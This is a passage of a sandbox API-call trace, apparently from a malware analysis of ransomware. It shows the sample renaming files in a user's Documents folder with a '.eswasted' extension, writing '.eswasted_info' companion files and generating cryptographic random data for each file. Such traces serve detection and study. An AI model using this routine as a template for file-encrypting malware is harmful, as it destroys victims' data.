halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\l3on-kdn.ppt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.114] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.116] SetEndOfFile (hFile=0x124) returned 1 [0076.116] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.116] lstrcpyW (in: lpString1=0x6f5d68, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\l3On-KdN.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\l3on-kdn.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\l3On-KdN.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\l3on-kdn.ppt.eswasted")) returned 1 [0076.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\l3On-KdN.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\l3on-kdn.ppt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.117] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0076.118] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.119] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.120] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.120] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.121] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.121] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.132] SetEndOfFile (hFile=0x124) returned 1 [0076.137] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.137] CloseHandle (hObject=0x124) returned 1 [0076.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.139] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.140] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.140] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.140] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\O4e_5o.pptx") returned 83 [0076.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b0) returned 0x6f6880 [0076.140] lstrcpyW (in: lpString1=0x6f6926, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0076.140] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.141] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0076.141] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\O4e_5o.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\o4e_5o.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.141] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.142] SetEndOfFile (hFile=0x124) returned 1 [0076.142] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.142] lstrcpyW (in: lpString1=0x6f6926, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\O4e_5o.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\o4e_5o.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\O4e_5o.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\o4e_5o.pptx.eswasted")) returned 1 [0076.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\O4e_5o.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\o4e_5o.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.143] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0076.144] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.145] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.145] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.145] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.146] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.146] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.154] SetEndOfFile (hFile=0x124) returned 1 [0076.156] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.156] CloseHandle (hObject=0x124) returned 1 [0076.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0076.158] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.159] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.159] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\TisyakUT71347sh2r6.odp") returned 94 [0076.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c6) returned 0x6fe5b8 [0076.159] lstrcpyW (in: lpString1=0x6fe674, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.159] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0076.159] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.160] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0076.160] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\TisyakUT71347sh2r6.odp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\tisyakut71347sh2r6.odp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.160] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.161] SetEndOfFile (hFile=0x124) returned 1 [0076.161] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.161] lstrcpyW (in: lpString1=0x6fe674, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\TisyakUT71347sh2r6.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\tisyakut71347sh2r6.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\TisyakUT71347sh2r6.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\tisyakut71347sh2r6.odp.eswasted")) returned 1 [0076.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\TisyakUT71347sh2r6.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\tisyakut71347sh2r6.odp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0076.162] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.165] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.165] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.165] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.165] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.166] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.166] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.174] SetEndOfFile (hFile=0x124) returned 1 [0076.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.176] CloseHandle (hObject=0x124) returned 1 [0076.178] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fe5b8 | out: hHeap=0x6d0000) returned 1 [0076.178] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.231] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.231] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\YnER3vWhoTYza3zQ.odt") returned 92 [0076.231] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c2) returned 0x6fe5b8 [0076.231] lstrcpyW (in: lpString1=0x6fe670, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.231] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.231] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.232] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.232] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\YnER3vWhoTYza3zQ.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\yner3vwhotyza3zq.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.233] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.234] SetEndOfFile (hFile=0x124) returned 1 [0076.234] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.234] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.234] lstrcpyW (in: lpString1=0x6fe670, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\YnER3vWhoTYza3zQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\yner3vwhotyza3zq.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\YnER3vWhoTYza3zQ.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\yner3vwhotyza3zq.odt.eswasted")) returned 1 [0076.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\YnER3vWhoTYza3zQ.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\yner3vwhotyza3zq.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0076.235] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0076.237] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.238] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.238] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.238] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.239] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.239] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.251] SetEndOfFile (hFile=0x124) returned 1 [0076.257] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.257] CloseHandle (hObject=0x124) returned 1 [0076.259] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fe5b8 | out: hHeap=0x6d0000) returned 1 [0076.259] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.260] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.260] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.260] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\GFOqjIYJRPzd.pps") returned 80 [0076.260] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x6f65b8 [0076.260] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.260] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.260] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.261] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.261] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\GFOqjIYJRPzd.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\gfoqjiyjrpzd.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.262] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.263] SetEndOfFile (hFile=0x124) returned 1 [0076.263] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.264] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\GFOqjIYJRPzd.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\gfoqjiyjrpzd.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\GFOqjIYJRPzd.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\gfoqjiyjrpzd.pps.eswasted")) returned 1 [0076.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\GFOqjIYJRPzd.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\gfoqjiyjrpzd.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0076.265] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0076.267] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.268] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.268] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.268] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.269] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.269] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.767] SetEndOfFile (hFile=0x124) returned 1 [0076.769] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.769] CloseHandle (hObject=0x124) returned 1 [0076.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0076.771] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.772] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.772] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\WyyXYQVof.csv") returned 77 [0076.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a4) returned 0x71ec18 [0076.772] lstrcpyW (in: lpString1=0x71ecb2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.772] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.773] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.773] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\WyyXYQVof.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\wyyxyqvof.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.774] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.775] SetEndOfFile (hFile=0x124) returned 1 [0076.775] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.775] lstrcpyW (in: lpString1=0x71ecb2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\WyyXYQVof.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\wyyxyqvof.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\WyyXYQVof.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\wyyxyqvof.csv.eswasted")) returned 1 [0076.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\WyyXYQVof.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\uykkqou3_kh\\wyyxyqvof.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0076.776] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.779] CryptAcquireContextW (in: phProv=0x130fe84, 